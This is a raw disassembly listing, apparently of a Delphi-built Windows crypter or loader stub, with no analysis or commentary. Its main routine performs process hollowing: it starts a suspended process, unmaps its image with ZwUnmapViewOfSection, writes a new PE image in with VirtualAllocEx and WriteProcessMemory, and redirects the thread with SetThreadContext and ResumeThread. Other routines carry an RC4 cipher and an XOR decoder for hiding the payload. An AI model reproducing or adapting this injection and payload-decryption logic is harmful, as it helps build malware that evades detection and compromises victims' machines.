loc_40346C: ; CODE XREF: sub_403448+2A�j
retn
; ---------------------------------------------------------------------------
loc_40346D: ; DATA XREF: sub_403448+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_40346C
; ---------------------------------------------------------------------------
loc_403474: ; CODE XREF: sub_403448:loc_40346C�j
; DATA XREF: sub_403448+1F�o
pop ebp
retn
sub_403448 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403478 proc near ; DATA XREF: CODE:00403F94�o
sub ds:dword_4064C4, 1
retn
sub_403478 endp
; =============== S U B R O U T I N E =======================================
sub_403480 proc near ; CODE XREF: sub_403640+16E�p
lea edx, [eax+18h]
movzx eax, word ptr [eax+14h]
add edx, eax
mov eax, edx
retn
sub_403480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40348C proc near ; CODE XREF: sub_403640+135�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp ds:dword_4064CC, 0
jnz short loc_4034B5
push offset ProcName ; "VirtualAllocEx"
push offset ModuleName ; "kernel32.dll"
call GetModuleHandleA_0
push eax ; hModule
call GetProcAddress
mov ds:dword_4064CC, eax
loc_4034B5: ; CODE XREF: sub_40348C+D�j
cmp ds:dword_4064CC, 0
jnz short loc_4034C7
push 78h ; dwErrCode
call SetLastError
jmp short loc_4034E3
; ---------------------------------------------------------------------------
loc_4034C7: ; CODE XREF: sub_40348C+30�j
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064CC
mov ebx, eax
loc_4034E3: ; CODE XREF: sub_40348C+39�j
mov eax, ebx
pop ebx
pop ebp
retn 14h
sub_40348C endp
; ---------------------------------------------------------------------------
align 4
; char ProcName[]
ProcName db 'VirtualAllocEx',0 ; DATA XREF: sub_40348C+F�o
align 4
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_40348C+14�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40350C proc near ; CODE XREF: sub_403640+1CF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp ds:dword_4064D0, 0
jnz short loc_403535
push offset aVirtualprotect ; "VirtualProtectEx"
push offset aKernel32_dll_0 ; "kernel32.dll"
call GetModuleHandleA_0
push eax ; hModule
call GetProcAddress
mov ds:dword_4064D0, eax
loc_403535: ; CODE XREF: sub_40350C+D�j
cmp ds:dword_4064D0, 0
jnz short loc_403547
push 78h ; dwErrCode
call SetLastError
jmp short loc_403563
; ---------------------------------------------------------------------------
loc_403547: ; CODE XREF: sub_40350C+30�j
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064D0
mov ebx, eax
loc_403563: ; CODE XREF: sub_40350C+39�j
mov eax, ebx
pop ebx
pop ebp
retn 14h
sub_40350C endp
; ---------------------------------------------------------------------------
align 4
; char aVirtualprotect[]
aVirtualprotect db 'VirtualProtectEx',0 ; DATA XREF: sub_40350C+F�o
align 10h
; char aKernel32_dll_0[]
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_40350C+14�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403590 proc near ; CODE XREF: sub_403640+F9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_4064D4, 0
jnz short loc_4035B6
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA_0
push eax ; hModule
call GetProcAddress
mov ds:dword_4064D4, eax
loc_4035B6: ; CODE XREF: sub_403590+A�j
cmp ds:dword_4064D4, 0
jnz short loc_4035C6
mov eax, 0C0000002h
jmp short loc_4035D4
; ---------------------------------------------------------------------------
loc_4035C6: ; CODE XREF: sub_403590+2D�j
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064D4
loc_4035D4: ; CODE XREF: sub_403590+34�j
pop ebp
retn 8
sub_403590 endp
; ---------------------------------------------------------------------------
; char aZwunmapviewofs[]
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_403590+C�o
align 10h
; char aNtdll_dll[]
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_403590+11�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035FC proc near ; DATA XREF: CODE:00403FA0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403621
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403628
loc_403620: ; CODE XREF: sub_4035FC+2A�j
retn
; ---------------------------------------------------------------------------
loc_403621: ; DATA XREF: sub_4035FC+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403620
; ---------------------------------------------------------------------------
loc_403628: ; CODE XREF: sub_4035FC:loc_403620�j
; DATA XREF: sub_4035FC+1F�o
pop ebp
retn
sub_4035FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40362C proc near ; DATA XREF: CODE:00403F9C�o
sub ds:dword_4064C8, 1
retn
sub_40362C endp
; =============== S U B R O U T I N E =======================================
sub_403634 proc near ; CODE XREF: sub_403640+1B8�p
shr eax, 1Dh
mov eax, ds:dword_4050A4[eax*4]
retn
sub_403634 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_403640(CONTEXT Context)
sub_403640 proc near ; CODE XREF: CODE:0040439F�p
; CODE:004043E2�p
Context = CONTEXT ptr -148h
push ebp
mov ebp, esp
add esp, 0FFFFFEB8h
push ebx
push esi
push edi
mov dword ptr [ebp+Context.ExtendedRegisters+70h], ecx
mov dword ptr [ebp+Context.ExtendedRegisters+74h], edx
mov dword ptr [ebp+Context.ExtendedRegisters+78h], eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+74h]
call sub_402048
mov eax, dword ptr [ebp+Context.ExtendedRegisters+70h]
call sub_402048
xor eax, eax
push ebp
push offset loc_4038B3
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+Context.ExtendedRegisters+6Fh], 0
lea eax, [ebp+Context.ExtendedRegisters+44h]
xor ecx, ecx
mov edx, 10h
call sub_4018A8
lea eax, [ebp+Context.ExtendedRegisters]
xor ecx, ecx
mov edx, 44h
call sub_4018A8
mov dword ptr [ebp+Context.ExtendedRegisters], 44h
xor eax, eax
mov al, [ebp+Context.ExtendedRegisters+84h]
mov word ptr [ebp+Context.ExtendedRegisters+30h], ax
lea eax, [ebp+Context.ExtendedRegisters+44h]
push eax ; lpProcessInformation
lea eax, [ebp+Context.ExtendedRegisters]
push eax ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 4 ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
mov eax, dword ptr [ebp+Context.ExtendedRegisters+70h]
call sub_402058
push eax ; lpCommandLine
mov eax, dword ptr [ebp+Context.ExtendedRegisters+74h]
call sub_402058
push eax ; lpApplicationName
call CreateProcessA
test eax, eax
jz loc_403898
mov [ebp+Context.ExtendedRegisters+6Eh], 0
xor eax, eax
push ebp
push offset loc_403891
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+Context.ContextFlags], 10002h
lea eax, [ebp+Context]
push eax ; lpContext
mov eax, dword ptr [ebp+Context.ExtendedRegisters+48h]
push eax ; hThread
call GetThreadContext
test eax, eax
jz loc_403863
lea eax, [ebp+Context.ExtendedRegisters+64h]
push eax ; lpNumberOfBytesRead
push 4 ; nSize
lea eax, [ebp+Context.ExtendedRegisters+68h]
push eax ; lpBuffer
mov eax, [ebp+Context._Ebx]
add eax, 8
push eax ; lpBaseAddress
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax ; hProcess
call ReadProcessMemory
test eax, eax
jz loc_403863
mov eax, dword ptr [ebp+Context.ExtendedRegisters+68h]
push eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax
call sub_403590
test eax, eax
jl loc_403863
cmp dword ptr [ebp+Context.ExtendedRegisters+78h], 0
jz loc_403863
mov eax, dword ptr [ebp+Context.ExtendedRegisters+78h]
mov eax, [eax+3Ch]
add eax, dword ptr [ebp+Context.ExtendedRegisters+78h]
mov dword ptr [ebp+Context.ExtendedRegisters+60h], eax
push 4
push 3000h
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
mov eax, [eax+50h]
push eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
mov eax, [eax+34h]
push eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax
call sub_40348C
mov dword ptr [ebp+Context.ExtendedRegisters+68h], eax
cmp dword ptr [ebp+Context.ExtendedRegisters+68h], 0
jz loc_403863
lea eax, [ebp+Context.ExtendedRegisters+5Ch]
push eax ; lpNumberOfBytesWritten
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
mov eax, [eax+54h]
push eax ; nSize
mov eax, dword ptr [ebp+Context.ExtendedRegisters+78h]
push eax ; lpBuffer
mov eax, dword ptr [ebp+Context.ExtendedRegisters+68h]
push eax ; lpBaseAddress
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax ; hProcess
call WriteProcessMemory
test eax, eax
jz loc_403863
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
call sub_403480
mov esi, eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_40381A
inc eax
mov dword ptr [ebp+Context.ExtendedRegisters+54h], eax
xor ebx, ebx
loc_4037C7: ; CODE XREF: sub_403640+1D8�j
lea eax, [ebp+Context.ExtendedRegisters+5Ch]
push eax ; lpNumberOfBytesWritten
lea edi, [ebx+ebx*4]
mov eax, [esi+edi*8+10h]
push eax ; nSize
mov eax, [esi+edi*8+14h]
add eax, dword ptr [ebp+Context.ExtendedRegisters+78h]
push eax ; lpBuffer
mov eax, [esi+edi*8+0Ch]
add eax, dword ptr [ebp+Context.ExtendedRegisters+68h]
push eax ; lpBaseAddress
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax ; hProcess
call WriteProcessMemory
test eax, eax
jz short loc_403814
lea eax, [ebp+Context.ExtendedRegisters+58h]
push eax
mov eax, [esi+edi*8+24h]
call sub_403634
push eax
mov eax, [esi+edi*8+8]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, dword ptr [ebp+Context.ExtendedRegisters+68h]
push eax
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax
call sub_40350C
loc_403814: ; CODE XREF: sub_403640+1AE�j
inc ebx
dec dword ptr [ebp+Context.ExtendedRegisters+54h]
jnz short loc_4037C7
loc_40381A: ; CODE XREF: sub_403640+17F�j
lea eax, [ebp+Context.ExtendedRegisters+5Ch]
push eax ; lpNumberOfBytesWritten
push 4 ; nSize
lea eax, [ebp+Context.ExtendedRegisters+68h]
push eax ; lpBuffer
mov eax, [ebp+Context._Ebx]
add eax, 8
push eax ; lpBaseAddress
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax ; hProcess
call WriteProcessMemory
test eax, eax
jz short loc_403863
mov eax, dword ptr [ebp+Context.ExtendedRegisters+60h]
mov eax, [eax+28h]
add eax, dword ptr [ebp+Context.ExtendedRegisters+68h]
mov [ebp+Context._Eax], eax
lea eax, [ebp+Context]
push eax ; lpContext
mov eax, dword ptr [ebp+Context.ExtendedRegisters+48h]
push eax ; hThread
call SetThreadContext
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+Context.ExtendedRegisters+6Eh], al
loc_403863: ; CODE XREF: sub_403640+C6�j
; sub_403640+EB�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403898
loc_403870: ; CODE XREF: sub_403640+256�j
cmp [ebp+Context.ExtendedRegisters+6Eh], 0
jnz short loc_403883
push 0 ; uExitCode
mov eax, dword ptr [ebp+Context.ExtendedRegisters+44h]
push eax ; hProcess
call TerminateProcess
jmp short loc_403890
; ---------------------------------------------------------------------------
loc_403883: ; CODE XREF: sub_403640+234�j
mov eax, dword ptr [ebp+Context.ExtendedRegisters+48h]
push eax ; hThread
call ResumeThread
mov [ebp+Context.ExtendedRegisters+6Fh], 1
loc_403890: ; CODE XREF: sub_403640+241�j
retn
; ---------------------------------------------------------------------------
loc_403891: ; DATA XREF: sub_403640+9F�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403870
; ---------------------------------------------------------------------------
loc_403898: ; CODE XREF: sub_403640+92�j
; sub_403640:loc_403890�j
; DATA XREF: ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4038BA
loc_4038A5: ; CODE XREF: sub_403640+278�j
lea eax, [ebp+Context.ExtendedRegisters+70h]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_4038B3: ; DATA XREF: sub_403640+28�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4038A5
; ---------------------------------------------------------------------------
loc_4038BA: ; CODE XREF: sub_403640+272�j
; DATA XREF: sub_403640+260�o
mov al, [ebp+Context.ExtendedRegisters+6Fh]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_403640 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038C8 proc near ; DATA XREF: CODE:00403FA8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4038ED
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4038F4
loc_4038EC: ; CODE XREF: sub_4038C8+2A�j
retn
; ---------------------------------------------------------------------------
loc_4038ED: ; DATA XREF: sub_4038C8+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4038EC
; ---------------------------------------------------------------------------
loc_4038F4: ; CODE XREF: sub_4038C8:loc_4038EC�j
; DATA XREF: sub_4038C8+1F�o
pop ebp
retn
sub_4038C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4038F8 proc near ; DATA XREF: CODE:00403FA4�o
sub ds:dword_4064D8, 1
retn
sub_4038F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403900 proc near ; CODE XREF: sub_4039AC+C4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403999
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov eax, [ebp+var_4]
call sub_401F04
mov ecx, eax
test ecx, ecx
jle short loc_403970
mov ebx, 1
loc_403941: ; CODE XREF: sub_403900+57�j
mov eax, [ebp+var_4]
mov al, [eax+ebx-1]
and eax, 0FFh
xor edx, edx
add [ebp+var_10], eax
adc [ebp+var_C], edx
inc ebx
dec ecx
jnz short loc_403941
jmp short loc_403970
; ---------------------------------------------------------------------------
loc_40395B: ; CODE XREF: sub_403900+7D�j
; sub_403900:loc_403981�j
push 0
push 2
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
call sub_4025C0
mov [ebp+var_10], eax
mov [ebp+var_C], edx
loc_403970: ; CODE XREF: sub_403900+3A�j
; sub_403900+59�j
cmp [ebp+var_C], 0
jnz short loc_403981
cmp [ebp+var_10], 0FFh
ja short loc_40395B
jmp short loc_403983
; ---------------------------------------------------------------------------
loc_403981: ; CODE XREF: sub_403900+74�j
jg short loc_40395B
loc_403983: ; CODE XREF: sub_403900+7F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4039A0
loc_403990: ; CODE XREF: sub_403900+9E�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403999: ; DATA XREF: sub_403900+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403990
; ---------------------------------------------------------------------------
loc_4039A0: ; CODE XREF: sub_403900+98�j
; DATA XREF: sub_403900+8B�o
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
pop ebx
mov esp, ebp
pop ebp
retn
sub_403900 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039AC proc near ; CODE XREF: sub_403B84+50�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403AA8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov dword ptr [ebx], 0
mov dword ptr [ebx+4], 0
mov dword ptr [ebx+8], 0
mov dword ptr [ebx+0Ch], 0
mov dword ptr [ebx+10h], 0
mov dword ptr [ebx+14h], 0
cmp [ebp+arg_C], 0
jnz short loc_403A03
cmp [ebp+arg_8], 1
jnb short loc_403A13
jmp short loc_403A05
; ---------------------------------------------------------------------------
loc_403A03: ; CODE XREF: sub_4039AC+4D�j
jge short loc_403A13
loc_403A05: ; CODE XREF: sub_4039AC+55�j
mov [ebp+arg_8], 1
mov [ebp+arg_C], 0
loc_403A13: ; CODE XREF: sub_4039AC+53�j
; sub_4039AC:loc_403A03�j
cmp [ebp+arg_C], 0
jnz short loc_403A21
cmp [ebp+arg_8], 64h
jbe short loc_403A31
jmp short loc_403A23
; ---------------------------------------------------------------------------
loc_403A21: ; CODE XREF: sub_4039AC+6B�j
jle short loc_403A31
loc_403A23: ; CODE XREF: sub_4039AC+73�j
mov [ebp+arg_8], 63h
mov [ebp+arg_C], 0
loc_403A31: ; CODE XREF: sub_4039AC+71�j
; sub_4039AC:loc_403A21�j
cmp [ebp+arg_4], 0
jnz short loc_403A3F
cmp [ebp+arg_0], 1
jnb short loc_403A4F
jmp short loc_403A41
; ---------------------------------------------------------------------------
loc_403A3F: ; CODE XREF: sub_4039AC+89�j
jge short loc_403A4F
loc_403A41: ; CODE XREF: sub_4039AC+91�j
mov [ebp+arg_0], 2
mov [ebp+arg_4], 0
loc_403A4F: ; CODE XREF: sub_4039AC+8F�j
; sub_4039AC:loc_403A3F�j
cmp [ebp+arg_4], 0
jnz short loc_403A5D
cmp [ebp+arg_0], 64h
jbe short loc_403A6D
jmp short loc_403A5F
; ---------------------------------------------------------------------------
loc_403A5D: ; CODE XREF: sub_4039AC+A7�j
jle short loc_403A6D
loc_403A5F: ; CODE XREF: sub_4039AC+AF�j
mov [ebp+arg_0], 64h
mov [ebp+arg_4], 0
loc_403A6D: ; CODE XREF: sub_4039AC+AD�j
; sub_4039AC:loc_403A5D�j
mov eax, [ebp+var_4]
call sub_403900
mov [ebx], eax
mov [ebx+4], edx
mov eax, [ebp+arg_8]
mov [ebx+8], eax
mov eax, [ebp+arg_C]
mov [ebx+0Ch], eax
mov eax, [ebp+arg_0]
mov [ebx+10h], eax
mov eax, [ebp+arg_4]
mov [ebx+14h], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403AAF
loc_403A9F: ; CODE XREF: sub_4039AC+101�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403AA8: ; DATA XREF: sub_4039AC+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403A9F
; ---------------------------------------------------------------------------
loc_403AAF: ; CODE XREF: sub_4039AC+FB�j
; DATA XREF: sub_4039AC+EE�o
pop ebx
pop ecx
pop ebp
retn 10h
sub_4039AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AB8 proc near ; CODE XREF: sub_403B84+5D�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov esi, eax
lea edi, [ebp+var_20]
push ecx
mov ecx, 6
rep movsd
pop ecx
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403B75
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov edx, eax
mov eax, [ebp+var_8]
call sub_402184
mov ebx, [ebp+var_18]
mov eax, [ebp+var_4]
call sub_401F04
mov edi, eax
test edi, edi
jle short loc_403B5F
mov esi, 1
loc_403B13: ; CODE XREF: sub_403AB8+A5�j
mov eax, ebx
cdq
cmp edx, [ebp+var_C]
jnz short loc_403B22
cmp eax, [ebp+var_10]
jbe short loc_403B27
jmp short loc_403B24
; ---------------------------------------------------------------------------
loc_403B22: ; CODE XREF: sub_403AB8+61�j
jle short loc_403B27
loc_403B24: ; CODE XREF: sub_403AB8+68�j
mov ebx, [ebp+var_18]
loc_403B27: ; CODE XREF: sub_403AB8+66�j
; sub_403AB8:loc_403B22�j
mov eax, [ebp+var_8]
call sub_4020AC
lea eax, [eax+esi-1]
push eax
mov eax, [ebp+var_4]
mov al, [eax+esi-1]
and eax, 0FFh
xor edx, edx
push edx
push eax
mov eax, ebx
cdq
add eax, [ebp+var_20]
adc edx, [ebp+var_1C]
xor eax, [esp+44h+var_44]
xor edx, [esp+44h+var_40]
add esp, 8
pop edx
mov [edx], al
inc ebx
inc esi
dec edi
jnz short loc_403B13
loc_403B5F: ; CODE XREF: sub_403AB8+54�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403B7C
loc_403B6C: ; CODE XREF: sub_403AB8+C2�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403B75: ; DATA XREF: sub_403AB8+28�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403B6C
; ---------------------------------------------------------------------------
loc_403B7C: ; CODE XREF: sub_403AB8+BC�j
; DATA XREF: sub_403AB8+AF�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403AB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B84 proc near ; CODE XREF: CODE:004041AF�p
; CODE:0040463B�p ...
var_20 = byte ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
mov ebx, ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
mov eax, [ebp+var_8]
call sub_402048
xor eax, eax
push ebp
push offset loc_403C01
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov edx, eax
mov eax, ebx
call sub_402184
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
mov edx, [ebp+var_8]
call sub_4039AC
mov ecx, ebx
mov edx, [ebp+var_4]
lea eax, [ebp+var_20]
call sub_403AB8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403C08
loc_403BF3: ; CODE XREF: sub_403B84+82�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_403C01: ; DATA XREF: sub_403B84+22�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403BF3
; ---------------------------------------------------------------------------
loc_403C08: ; CODE XREF: sub_403B84+7C�j
; DATA XREF: sub_403B84+6A�o
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_403B84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C10 proc near ; DATA XREF: CODE:00403FB0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403C35
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064DC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403C3C
loc_403C34: ; CODE XREF: sub_403C10+2A�j
retn
; ---------------------------------------------------------------------------
loc_403C35: ; DATA XREF: sub_403C10+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403C34
; ---------------------------------------------------------------------------
loc_403C3C: ; CODE XREF: sub_403C10:loc_403C34�j
; DATA XREF: sub_403C10+1F�o
pop ebp
retn
sub_403C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C40 proc near ; DATA XREF: CODE:00403FAC�o
sub ds:dword_4064DC, 1
retn
sub_403C40 endp
; =============== S U B R O U T I N E =======================================
sub_403C48 proc near ; CODE XREF: sub_403D98+15�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_1C], edx
mov edi, eax
mov eax, [esp+1Ch+var_1C]
call sub_401F04
mov [esp+1Ch+var_14], eax
mov byte ptr [edi+100h], 0
mov byte ptr [edi+101h], 0
xor edx, edx
mov eax, edi
loc_403C72: ; CODE XREF: sub_403C48+30�j
mov [eax], dl
inc edx
inc eax
test dl, dl
jnz short loc_403C72
xor eax, eax
xor esi, esi
mov dl, 0
mov ecx, edi
loc_403C82: ; CODE XREF: sub_403C48+82�j
cmp esi, [esp+1Ch+var_14]
jge short loc_403C94
mov ebx, [esp+1Ch+var_1C]
mov bl, [ebx+esi]
mov [esp+1Ch+var_17], bl
jmp short loc_403C99
; ---------------------------------------------------------------------------
loc_403C94: ; CODE XREF: sub_403C48+3E�j
mov [esp+1Ch+var_17], 0
loc_403C99: ; CODE XREF: sub_403C48+4A�j
inc esi
cmp esi, [esp+1Ch+var_14]
jl short loc_403CA2
xor esi, esi
loc_403CA2: ; CODE XREF: sub_403C48+56�j
mov bl, [ecx]
add bl, [esp+1Ch+var_17]
add al, bl
mov bl, [ecx]
mov [esp+1Ch+var_18], bl
xor ebx, ebx
mov bl, al
mov bl, [edi+ebx]
mov [ecx], bl
xor ebx, ebx
mov bl, al
lea ebp, [edi+ebx]
mov bl, [esp+1Ch+var_18]
mov [ebp+0], bl
inc ecx
dec dl
jnz short loc_403C82
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403C48 endp
; =============== S U B R O U T I N E =======================================
sub_403CD4 proc near ; CODE XREF: sub_403D98+4A�p
xor ecx, ecx
mov edx, 102h
call sub_4018A8
retn
sub_403CD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CE4 proc near ; CODE XREF: sub_403D5C+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
dec ebx
test ebx, ebx
jl short loc_403D54
inc ebx
mov [ebp+var_4], ebx
mov esi, edx
loc_403CF9: ; CODE XREF: sub_403CE4+6E�j
inc byte ptr [eax+100h]
xor edx, edx
mov dl, [eax+100h]
mov dl, [eax+edx]
add [eax+101h], dl
xor ebx, ebx
mov bl, [eax+101h]
mov bl, [eax+ebx]
push ebx
xor ebx, ebx
mov bl, [eax+100h]
lea edi, [eax+ebx]
pop ebx
mov [edi], bl
xor ebx, ebx
mov bl, [eax+101h]
mov [eax+ebx], dl
xor ebx, ebx
mov bl, [eax+100h]
add dl, [eax+ebx]
and edx, 0FFh
mov dl, [eax+edx]
xor dl, [esi]
mov [ecx], dl
inc ecx
inc esi
dec [ebp+var_4]
jnz short loc_403CF9
loc_403D54: ; CODE XREF: sub_403CE4+D�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_403CE4 endp
; =============== S U B R O U T I N E =======================================
sub_403D5C proc near ; CODE XREF: sub_403D98+32�p
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov esi, edx
mov ebp, eax
mov eax, esi
call sub_401F04
mov ebx, eax
mov eax, edi
mov edx, ebx
call sub_402184
push ebx
mov eax, edi
call sub_4020AC
push eax
mov eax, esi
call sub_402058
mov edx, eax
mov eax, ebp
pop ecx
call sub_403CE4
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403D5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
